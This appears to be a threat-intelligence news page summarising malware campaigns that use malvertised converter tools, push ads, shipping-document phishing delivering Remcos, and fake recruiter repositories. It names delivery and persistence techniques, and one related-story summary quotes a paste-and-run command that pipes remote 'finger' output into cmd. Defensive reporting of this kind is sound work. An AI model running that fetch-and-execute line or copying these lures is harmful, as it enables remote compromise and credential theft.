Malware Delivery via Deceptive Lures: Malvertising, Fake Recruitment Repos, and Phishing Dropping RATs
Multiple reports detail social-engineering-driven malware delivery that results in remote access trojans (RATs) and credential theft. Infoblox described observing an affiliate push-notification ad network after exploiting misconfigured DNS delegations (“Sitting Ducks”/lame name server delegation) to take over abandoned threat-actor domains, allowing collection of ~57M logs over two weeks and visibility into widespread scams and brand impersonation delivered via push ads. Nextron Systems separately reported recurring malvertising chains where “free converter” tools (e.g., document/image converters) downloaded from ads on legitimate sites function as advertised while covertly installing persistent RATs, with common artifacts such as Windows Mark-of-the-Web (ZoneId=3) indicating internet origin.
Other activity in the set reflects different initial-access lures but the same general outcome—RAT-style access and data theft. Fortinet analyzed a phishing campaign using a fake Vietnam shipping document: a Word attachment leads to an RTF stage that exploits an RTF-related vulnerability, then uses VBScript/PowerShell to load a fileless .NET module, ultimately downloading and injecting a Remcos variant (including process hollowing) to provide full remote control. Separately, reporting on North Korea’s “Contagious Interview” campaign described fake recruiter outreach (e.g., via LinkedIn) that tricks developers into opening malicious code repositories; execution can be triggered via a hidden VS Code tasks configuration, server-side logic hooks, or a malicious npm dependency to steal credentials/crypto wallets and establish persistence—this is thematically similar (social engineering leading to remote access) but is a distinct operation from the malvertising/push-ad and Remcos phishing activity.
Timeline
Jan 15, 2026
Infoblox publishes analysis of a malicious push network from 57M logs
Infoblox released a threat intelligence report examining a malicious push network using analysis of 57 million logs. The available reference does not provide further event details beyond the publication of the research.
Jan 14, 2026
Detection guidance and indicators released for converter malware campaign
Nextron Systems released defensive guidance focused on monitoring scheduled task creation and execution, relevant Windows and Sysmon events, and using AppLocker or WDAC to block execution from user-writable paths. The publication also shared related delivery domains, code-signing certificate details, and file hashes tied to the campaign.
Jan 14, 2026
Researchers detail ConvertMate infection chain and persistence method
Nextron Systems published technical analysis of a representative sample, ConvertMate.exe, showing it installs under %LocalAppData%, creates a victim identifier file, and uses PowerShell to register a scheduled task that launches a second-stage backdoor with delayed recurring execution. The report also described the backdoor's communication with confetly[.]com to authenticate, fetch .NET payloads, and return execution results.
Jan 14, 2026
Malvertising campaigns distribute trojanized file-converter software
By mid-January 2026, researchers documented multiple active infection chains in which malicious Google ads and converter-themed websites tricked users into downloading fake or trojanized file-converter tools. The software appeared to work normally while covertly installing persistent remote access malware.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Malware
Organizations
Affected Products
Sources
Related Stories
Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads
Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.
1 months ago
Malware Campaigns Using Social Engineering to Deliver Proxyware, RATs, and Ransomware
Multiple active malware campaigns are using **social engineering** and **trojanized content** to compromise Windows systems, with lures ranging from pirated software downloads to business and shipping documents. AhnLab reported a “proxyjacking” operation attributed to **Larva-25012** that distributes fake installers (notably a trojanized *Notepad++* package) via cracked-software sites; the `Setup.zip` bundle includes a legitimate `Setup.exe` plus a malicious sideloaded DLL (`TextShaping.dll`) that decrypts and installs **DPLoader** for persistent command retrieval and follow-on payload delivery. The malware also tampers with defenses by changing Microsoft Defender settings (e.g., exclusions, reduced notifications, and blocking sample submission) to reduce detection while monetizing victims’ bandwidth through installed **proxyware**. Separately, FortiGuard Labs described a Russia-focused, multi-stage intrusion chain that abuses trusted services (**GitHub** and **Dropbox**) for payload hosting and weaponizes **Defendnot** (a Windows Security Center trust-model research tool) to disable **Microsoft Defender** before deploying a ransomware payload. Fortinet also documented phishing campaigns using weaponized shipping-themed Word documents to deliver **Remcos RAT**, including fileless execution behavior and exploitation of `CVE-2017-11882` (Microsoft Equation Editor) via remotely fetched templates. These campaigns reinforce the operational risk from user-driven execution paths (pirated installers and document lures), “living off the land” techniques, and defense evasion through both policy tampering and security tooling abuse.
1 months ago
Multiple RAT Delivery Campaigns Using Phishing and Trojanized Software
Security researchers reported several unrelated **remote access trojan (RAT)** delivery campaigns using different initial access vectors and lures. Seqrite Labs described “**Operation Covert Access**,” a spear‑phishing operation targeting Argentina’s judiciary with a ZIP attachment containing a convincing court-resolution decoy; execution is triggered by a malicious `LNK` masquerading as a PDF, which launches hidden PowerShell to fetch additional stages from a GitHub repository, culminating in a custom **Rust-based RAT** that attempts to blend in by renaming itself (e.g., `msedge_proxy.exe`). Separately, AhnLab Security Intelligence Center reported South Korea-focused activity distributing **RemcosRAT** through illegal online gambling-related tools and trojanized *VeraCrypt* installers, using embedded malicious VBS scripts and a multi-stage chain that ultimately deploys a RAT capable of surveillance and data theft (e.g., keylogging, screenshot/webcam/mic capture, credential/data harvesting). Another campaign documented by ReliaQuest abused **LinkedIn private messages** to deliver a bundled legitimate application alongside a malicious DLL for **DLL sideloading**, enabling RAT deployment under the guise of a trusted process; the reporting emphasized that social platforms can serve as effective phishing channels beyond email and that the technique is portable to other commonly used business messaging platforms.
1 months ago